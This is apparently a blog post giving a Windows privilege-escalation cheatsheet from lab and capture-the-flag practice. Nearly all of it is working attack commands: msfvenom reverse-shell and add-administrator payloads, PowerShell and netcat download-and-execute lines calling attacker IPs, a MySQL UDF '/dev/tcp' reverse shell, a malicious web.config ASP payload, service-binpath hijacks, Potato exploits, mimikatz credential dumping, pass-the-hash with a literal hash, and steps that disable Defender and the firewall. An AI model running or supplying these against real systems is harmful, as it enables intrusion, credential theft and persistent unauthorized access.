Windows Privilege Escalation Cheatsheet
Find OS Version:
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
Check for Privileges
whoami /priv
List Running Services Using sc & wmic
wmic service where started=true get name, startname
#List all LocalSystem(Administrator) Services
wmic service get Name,DisplayName,StartName,State | findstr /I "LocalSystem"
wmic service get Name,StartName,State | findstr /I "LocalSystem Administrator"
#List All Services and their Privileges
wmic service get Name,DisplayName,StartName,State
#list All Services running as Admin
wmic service where "StartName='LocalSystem' or StartName='NT AUTHORITY\SYSTEM'" get Name,DisplayName,StartName,State
#Filter a Running Administrator Service
wmic service where "State='Running' and (StartName='LocalSystem' or StartName='NT AUTHORITY\SYSTEM')" get Name,DisplayName,StartName,State
#Using SC list all Services
sc query state= all
#Using SC list all Running Services
sc query state= all | findstr /I /C:"SERVICE_NAME:" /C:"STATE"
#Filter for Specific Service
sc query YourServiceName | findstr /I /C:"SERVICE_NAME:" /C:"STATE"
List Running Services using Powershell Get-WMIObject
#List All Running Services with their privileges - Service account
Get-WmiObject -Class Win32_Service | Select-Object Name, StartName | Format-Table -AutoSize
#More Info
Get-WmiObject -Class Win32_Service | Select-Object Name, DisplayName, StartName, State | Format-Table -AutoSize
#List Administrator Services
Get-WmiObject -Class Win32_Service | Where-Object { $_.StartName -match "LocalSystem|NT AUTHORITY\\SYSTEM|Administrator" } | Select-Object Name, StartName | Format-Table -AutoSize
#Running Services
Get-WmiObject -Class Win32_Service | Where-Object { $_.State -eq "Running" } | Select-Object Name, DisplayName, StartName, State | Format-Table -AutoSize
#Filter for a specific Service under Running Services using Name
Get-WmiObject -Class Win32_Service | Where-Object { $_.State -eq "Running" -and $_.Name -eq "YourServiceName" } | Select-Object Name, DisplayName, StartName, State | Format-Table -AutoSize
Get-WmiObject -Class Win32_Service | Where-Object { $_.State -eq "Running" -and $_.Name -eq "vpnagent" } | Select-Object Name, DisplayName, StartName, State | Format-Table -AutoSize
#Filter for a Specific Service using Displayname
Get-WmiObject -Class Win32_Service | Where-Object { $_.State -eq "Running" -and $_.DisplayName -eq "Windows Event Collector" } | Select-Object Name, DisplayName, StartName, State | Format-Table -AutoSize
AlwaysInstall Elevated: Allows non-privileged users to run executables as SYSTEM reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated If Available: msfvenom -p windows/adduser USER=bhanu PASS=bhanu123 -f msi -o create_user.msi On target:
msiexec /quiet /qn /i C:\create_user.msi Metasploit: use exploit/windows/local/always_install_elevated
Scheduled Tasks:
schtasks /query /fo LIST /v /Too much info
Running Windows Services
net start
Services Running on Localhost netstat -ano netstat -an | find "LISTEN" Using Plink: plink.exe -l username -pw pasword KALI_IP -R Attacker_Port_to_receive:127.0.0.1:Victim_port_to_Forward Example: plink -l root -pw password KALI_IP -R 3390:127.0.0.1:3389 Portforward using Meterpreter: portfwd add -l <attacker port> -p <victim port> -r <victim ip> portfwd add -l 3306 -p 3306 -r 192.168.1.101
Compiling 32-bit Exploits:
i686-w64-mingw32-gcc exploit.c -o exploit.exe -lws2_32
World Readable
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
Autologon Registry
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
Powershell Command History #Get the Commands History Path (Get-PSReadLineOption).HistorySavePath # Generally in the location %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
View Hidden Directories
dir -Force
Poweshell Commands:
Get-ChildItem . -Force
gci -Force
ls -Force
Find Passwords in Registry
# Windows autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
# VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKCU\Software\TightVNC\Server /v PasswordViewOnly"
vncpwd.exe PASSWORD_FROM_ABOVE
# SNMP Parameters
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
# Putty
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
# Search for password in registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
IIS Webserver - Hidden Files and Config Files
dir /a C:\inetpub\ dir /s web.config C:\Windows\System32\inetsrv\config\applicationHost.config
Anything in Credential Manger
cmdkey /list
dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\
Check for Vulnerable Drivers
DRIVERQUERY
Find Installed Paths
wmic qfe get Caption,Description,HotFixID,InstalledOn
Using Runas to run as Different User PsExec.exe -u hostname\username -p password "nc.exe TARGET_IP 443 -e cmd.exe" C:\Windows\System32\runas.exe /env /noprofile /user:USERNAME PASSWORD "c:\users\Public\nc.exe -nc TARGET_IP 443 -e cmd.exe" Using Powershell: secpasswd = ConvertTo-SecureString "PASSWORD" -AsPlainText -Force mycreds = New-Object System.Management.Automation.PSCredential ("USERNAME", $secpasswd) computer = "HOSTNAME" [System.Diagnostics.Process]::Start("C:\users\public\nc.exe","<attacker_ip> 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer) TO run the Script: powershell -ExecutionPolicy Bypass -File c:\users\public\r.ps1
Can We Access SAM & System Files
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
Checking File Permissions using assesschk.exe
accesschk.exe -qwsu "Everyone" *
accesschk.exe -qwsu "Authenticated Users" *
accesschk.exe -qwsu "Users" *
accesschk.exe -uwcqv "username" * / Check for RW permissions
Exploit:
sc config daclsvc binpath= "net localgroup administrators bhanu /add "
sc start daclsvc
What are the running processes/services on the system? Is there an inside service not exposed? If so, can we open it?
tasklist /svc
tasklist /v
net start
sc query
Always Install Elevated Privileges
This the DWORD of these registries contain "AlwaysInstallElevated" which is set to "1", we can install any msi as NT Authrity\System
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
OR
reg qurey "HKLM\Software\Policies\Microsoft\Windows\Installer"
reg qurey "HKCU\Software\Policies\Microsoft\Windows\Installer"
Exploit:
msfvenom -p windows/exec CMD='net localgroup administrators bhanu /add' -f msi-nouac -o exploit.msi
on Target: msiexec /quiet /qn /i C:\temp\exploit.msi
Scheduled Tasksschtasks /query /fo LIST 2>nul | findstr TaskName dir C:\windows\tasks Powershell:
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
Unquoted Service Paths - can be exploited - use PowerUP
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """ OR
wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:\Windows\\" 2>nul |findstr /i /v """ OR
sc query state= all | findstr "SERVICE_NAME:" >> a & FOR /F "tokens=2 delims= " %i in (a) DO @echo %i >> b & FOR /F %i in (b) DO @(@echo %i & @echo --------- & @sc qc %i | findstr "BINARY_PATH_NAME" & @echo.) & del a 2>nul & del b 2>nul Powershell:
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
Juicy Potato Exploit - SeImpersonatePrivilege Enabled
JuicyPotato.exe -l 1340 -p C:\users\User\rev.exe -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.37 LPORT=443 -f exe -o reverse.exe
./jp.exe -l 1345 -p c:\windows\temp\reverse.exe -t *
Operating System information is found in
C:\Windows\System32\license.rtf --> windows 7
C:\Windows\System32\eula.txt --> windows xp
Decrypt GPP Policy from Groups.xml Groups.xml: get-content "C:\programdata\Microsoft\group policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml" <?xml version="1.0" encoding="UTF-8" ?><Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"> <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator" image="2" changed="2019-01-28 23:12:48" uid="{CD450F70-CDB8-4948-B908-F8D038C59B6C}" userContext="0" removePolicy="0" policyApplied="1"> <Properties action="U" newName="" fullName="" description="" cpassword="CiDUq6tbrBL1m/js9DmZNIydXpsE69WB9JrhwYRW9xywOz1/0W5VCUz8tBPXUkk9y80n4vw74KeUWc2+BeOVDQ" changeLogon="0" noChange="0" neverExpires="1" acctDisabled="0" userName="Administrator"></Properties></User></Groups> gpp-decrypt CiDUq6tbrBL1m/js9DmZNIydXpsE69WB9JrhwYRW9xywOz1/0W5VCUz8tBPXUkk9y80n4vw74KeUWc2+BeOVDQ
Check for Installed Patches wmic qfe get Caption,Description,HotFixID,InstalledOn
Using Sherlock To Check Vulns certutil -f -split -urlcache http://10.10.10.10/sherlock.ps1 poweshell -nop -ep bypass Import-Module .\sherlock.ps1 Find-AllVulns
Check these Config Files - Might contain Password type c:\windows\Panther\Untattended.xml \\Find Base64 password type "c:\ProgamData\McAfee\Common Framework\SiteList.xml" \\Find Base64 password c:\sysprep.inf c:\sysprep\sysprep.xml %WINDIR%\Panther\Unattend\Unattended.xml %WINDIR%\Panther\Unattended.xml
Priv Esc using a Service running as root: ------------------------------------------ services.msc select a service, which u think might be vulnerable and go to the file's location in cmd icacls scsiaccess.exe /if Everyone is present, we can exploit it by replacing the original file by our file in Kali: Lets create an exploit code for it :) ---------- nano useradd.c #include<stdlib.h> int main() { int i; i=system("net localgroup administrators username /add"); return 0; } ctrl +x --> y i586-mingw32msv-gcc useradd.c -o useradd.exe copy this useradd.exe to the target machine and name it as scsiaccess.exe restart the machine/service :) services.msc scsiaccess.exe --> right click --> restart
Powershell Sudo For Windows
$pw= convertto-securestring "EnterPasswordHere" -asplaintext -force
$pp = new-object -typename System.Management.Automation.PSCredential -argumentlist "EnterDomainName\EnterUserName",$pw
$script = "C:\Users\EnterUserName\AppData\Local\Temp\test.bat"
Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command &{Start-Process $script -verb Runas}'
powershell -ExecutionPolicy Bypass -File xyz.ps1
Disable Firewall/Defender and Enable RDP for all Users
sc stop WinDefend
netsh advfirewall show allprofiles
netsh advfirewall set allprofiles state off
netsh firewall set opmode disable
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
Downloading Files with bitsadmin
bitsadmin /transfer mydownloadjob /download /priority normal http://<attackerIP>/xyz.exe C:\\Users\\%USERNAME%\\AppData\\local\\temp\\xyz.exe
PsExec Shell for Remote Systems
.\psexec64.exe \\192.168.x.x -u .\administrator -p admin@123 cmd.exe
Search for keyword "pass,cred,vnc and config"
dir /s *pass* == *cred* == *vnc* == *.config*
search files with keyword "Password" in .xml,ini,.txt files findstr /si password *.xml *.ini *.txt
Grep Registry for "Password" Keyword reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s
Finding Services with incorrect permissions:for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a" If wmic is not availale - try sc
sc query state= all | findstr "SERVICE_NAME:" >> Servicenames.txt FOR /F %i in (Servicenames.txt) DO echo %i type Servicenames.txt FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt
Windows XP Priv Esc - Incorrect Permission in Services
sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 10.11.0.48 9002 -e C:\WINDOWS\System32\cmd.exe"
OR - run all the below commands together to create an Administrator account
sc config SSDPSRV start= auto
net start SSDPSRV
net start upnphost
sc config upnphost binpath= "net user bhanu bhanu123 /add"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
net start upnphost
sc config upnphost binpath= "net localgroup administrators bhanu /add "
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
net start upnphost
sc config upnphost binpath= "reg add 'hklm\system\currentcontrolset\control\terminal server' /f /v fDenyTSConnections /t REG_DWORD /d 0 "
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
net start upnphost
sc config upnphost binpath= "netsh firewall set service remoteadmin enable "
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
net start upnphost
sc config upnphost binpath= "netsh firewall set service remotedesktop enable"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
net start upnphost
in Kali:
rdesktop IP_Address
IIS HTTP 6.0 Exploit
No Proper Input Validation, So change your exploit to
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=443 -f asp -o payload.html
move payload.html payload.asp;.html
Priv Esc From NT Authrity Service to NT Authority System
Windows Server 2003 -- NT Authority Service to System
Download and copy the exploit to target machine
https://www.exploit-db.com/exploits/6705
Github
Exploiting IIS 6 with ASP .NET
copy churrasco.exe c:\windows\temp\
churrasco.exe -d "net users /add bhanu bhanu123"
churrasco.exe -d "net localgroup administrators bhanu /add"
churrasco.exe -d “reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0”
churrasco.exe -d "netsh firewall set service remoteadmin enable"
churrasco.exe -d “netsh firewall set service remotedesktop enable”
Might be Helpful - Rotten Potato
Session Hijacking - Privilege Impersonation
- when another user has a session on the same machine - need to run as admin #View the logged in sessions - users ; make sure the State is Disc (not-active) query user #create a service that runs as the other user ; /ID= the ID value from query user command; /dest= SESSION NAME from query user # You should see "[SC] CreateSession SUCCESS" sc create ServiceName binpath= "cmd.exe /k tscon 3 /dest:Atacker_SessionName" #Start the service; ServiceName = the one that we created earlier net start ServiceName #you should be running as the user now.
Exploiting IIS httpd 7.5 You need to add the following code at the end of web.config file and upload it into the server and get a reverse shell using it. reverse shell should be in winrevshell.ps1 file; a file sharing server should be turned on as well. <% Set s = CreateObject("WScript.Shell") Set cmd = s.Exec("cmd /c powershell -c IEX (New-Object Net.Webclient).downloadstring('http://IP_ADDRESS/winrevshell.ps1')") o = cmd.StdOut.Readall() Response.write(o) %> Sample Web.config file with Exploit <?xml version="1.0" encoding="UTF-8"?> <configuration> <system.webServer> <handlers accessPolicy="Read, Script, Write"> <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> </handlers> <security> <requestFiltering> <fileExtensions> <remove fileExtension=".config" /> </fileExtensions> <hiddenSegments> <remove segment="web.config" /> </hiddenSegments> </requestFiltering> </security> </system.webServer> </configuration> <% Set s = CreateObject("WScript.Shell") Set cmd = s.Exec("cmd /c powershell -c IEX (New-Object Net.Webclient).downloadstring('http://IP_ADDRESS/winrevshell.ps1')") o = cmd.StdOut.Readall() Response.write(o) %>
Mysql Running as Root Download the UDF file from Here Tutorial is here use mysql; create table potato(line blob); insert into potato values(load_file('/tmp/lib_mysqludf_sys.so')); select * from potato into dumpfile '/usr/lib/lib_mysqludf_sys.so'; create function sys_exec returns integer soname 'lib_mysqludf_sys.so'; select sys_exec('bash -i >& /dev/tcp/IP_ADDRESS/443 0>&1'); OR try the automated script Github Exploit Video Tutorial
Meterpreter ASP Reverse Shell or Windows
msfvenom -p windows/meterpreter/reverse_tcp -f aspx LHOST=10.11.0.48 LPORT=9001 -f asp > shell.asp
Dumping Credentials using mimikatz
mimikatz.exe
privilege::debug /You should see 200 OK
sekurlsa::logonpasswords /dump creds and other info
Current User: whoami /all
List out all Users:
net user
Add a user:
net user bhanu bhanu123 /add
Adding a user to Administrators Group:
net localgroup administrators bhanu /add
Remove a user:
net user bhanu /del
Check for Active Users using Powershell:
powershell -Command (get-wmiobject win32_useraccount
View Hidden Directories:
dir -Force
dir /R
Get a Proper Windows Shell:
apt-get install rlwrap
Powershell IEX(new-object Net.WebClient).Downloadstring(\"http://10.10.14.35:8001/revs.ps1\")
rlwrap nc -nvlp 9001
Hot Potato - Exploit
Importing a Powershell Exploit and execute it
powershell -ep bypass -nop
Import-Module .\Tater.ps1
Invoke-Tater -Trigger 1 -Command "net users \add bhanu"Invoke-Tater -Trigger 1 -Command "net localgroup administrators bhanu /add"
Download and Execute a Reverse Shell
Powershell IEX(new-object Net.WebClient).Downloadstring(\"http://10.10.14.35:8001/revs.ps1\")
python -m SimpleHTTPServer 8001
nc -nvlp 9001
#Reverse Shell Used is Nishang Invoke-Powershell-TCP.ps1
Download and Execute a Reverse Shell Powershell IEX(new-object Net.WebClient).Downloadstring(\"http://10.10.14.35:8001/revs.ps1\") python -m SimpleHTTPServer 8001 nc -nvlp 9001 #Reverse Shell Used is Nishang Invoke-Powershell-TCP.ps1
Change ACL for a file
cacls “C:\Users\Administrator\Desktop\root.txt” /E /P Alfred:F
cacls Windows utility to view/edit file permissions
/E to edit ACL
/P to set permissions
Alfred:F to give Alfred full control of the file
Change ACL for a file
cacls “C:\Users\Administrator\Desktop\root.txt” /E /P Alfred:F
cacls Windows utility to view/edit file permissions
/E to edit ACL
/P to set permissions
Alfred:F to give Alfred full control of the file
Add this to Cron Jobs To get a Shell
echo "IEX(New-Object Net.webClient).DownloadString('http://10.10.14.11:8001/rev9002.ps1')" > cronjob_FileName.ps1
Logging in with NTLM hashes
pth-winexe --user=jeeves/administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 --system //10.10.10.63 cmd.exe
Create RDP Access on a Target Machine Useful when you have remote code execution net user /add bhanu bhanu123 /Create an account named Bhanu net localgroup administrators bhanu /add Assign Admin Privs
reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0 Start RDP Service netsh firewall set service remoteadmin enable netsh firewall set service remotedesktop enable
On kali: rdesktop 10.10.10.10
{Metasploit} Login with NTML Pass hases into a Windows machine use exploit/windows/smb/psexec set rhost 10.10.10.10 set smbuser administrator set smbpass aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 set lport 8888 exploit
run getgui -e /Enable RDP on Target shell net user administrator password on Kali: rdesktop 10.10.10.10 administrator password
Check for Hidden Files:
get-content .\root.txt -stream *
get-content .\root.txt -stream root.txt
Run as admin with prev saved cred
runas /user:Administrator /noprofile /savecred "cmd.exe /c type C:\users\administrator\desktop\root.txt > C:\users\security\root.txt
File transfer using Certutil.exe
certutil.exe -urlcache -split -f http://10.10.14.6/sherlock.ps1 sherlock.ps1
Priv Esc (getting Root) using Metasploit
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.6 LPORT=9003 –platform win -a x64 -f exe > shell.exe
certutil -urlcache -f http://10.10.14.6:8001/shell.exe shell.exe
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set lport 9003
set lhost 10.10.14.6
run
run post/multi/recon/local_exploit_suggester
background
*********** use exploit/local/EXPLPOIT-SUGGESTED************
set lport 9004
set lhost 10.10.14.6
run
getuid
Transfer Files Using FTP Service
echo open 10.10.14.19>ftp_commands.txt&echo anonymous>>ftp_commands.txt&echo password>>ftp_commands.txt&echo binary>>ftp_commands.txt&echo get ms15.exe>>ftp_commands.txt&echo bye>>ftp_commands.txt&ftp -s:ftp_commands.txt
python -m pyftpdlib -p 21
Transfer Files & Getting Root Shell
powershell -Command (new-object System.Net.WebClient).Downloadfile('http://10.10.12.61:8001/shell.exe', 'shell.exe')
Create Exploit:
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=10.10.12.61 LPORT=31337 -e x86/shikata_ga_nai -f exe -o shell.exe
python -m SimplerHTTPServer 8001
dir | findstr shell
runas /user:Administrator /noprofile /savecred "cmd.exe /c shell.exe
Transfer Files & Getting Root Shell
Building the Payload: /usr/share/nishang/Shells/Invoke-PowershellTcp.ps1
already available on kali, if not Download from here.
echo "Invoke-PowerShellTcp -Reverse -IPAddress 10.10.10.10 -Port 9001 >> Invoke-PowershellTcp.ps1
python -m SimpleHTTPServer 8001
Transferring the Payload:
cd C:\Users\security\AppData\Local\Temp\
certutil -f split -urlcache http://10.10.10.10:8001/Invoke_powershellTcp.ps1
Run As Admin:
runas /user:ACCESS\administrator /savecred "powershell -ExecutionPolicy Bypass -File C:\Users\security\AppData\Local\Temp\Invoke-PowerShellTcp.ps1"
nc nvlp 9001
Useful Powershell Commands
Download a File using Power Shell:
powershell -Command (new-object System.Net.WebClient).Downloadfile('http://10.10.14.19:8001/41015.exe', 'shell.exe')
Download a File Using Power Shell:
nc.exe 10.10.10.10 8002 < CEH.kdbx
Execute a Command in Java Shell
def cmd = "cmd.exe /c dir".execute();
println("${cmd.text}");
Execute a Command in Java Shell
println "cmd.exe /c dir".execute().text
Upload a file using Power shell: in a java shell
def process = "powershell -command Invoke-WebRequest 'http://10.10.10.10:8001/nc.exe' -OutFile nc.exe".execute();
println("${process.text}");
Get a Reverse Shell using Powershell
def process = "powershell -command ./nc.exe 10.10.10.10 9001 -e cmd.exe".execute();
println("${process.text}");
nc.exe should be in the same directory; use the above command to download it.
Check for Hidden Files
get-content .\root.txt -stream *
get-content .\root.txt -stream root.txt
Download and Execute Powershell Script on Victim Machine Powershell IEX(new-object Net.WebClient).Downloadstring(\"http://10.10.14.35:8001/revs.ps1\") python -m SimpleHTTPServer 8001 nc -nvlp 9001 #Reverse Shell Used is Nishang Invoke-Powershell-TCP.ps1
Download and Execute Powershell Script on Victim Machine
- Method II
powershell Invoke-WebRequest -Uri 10.10.14.35:8001/nc.exe -OutFile C:\Users\Administrator\downloads\nc.exe
python -m SimpleHTTPServer 8001
C:\users\administrator\downloads\nc.exe -e cmd 10.10.14.35 9001
nc -nvlp 9001
Let me know if I missed something important and You can find Linux Privilege Escalation Cheatsheet here
No comments:
Post a Comment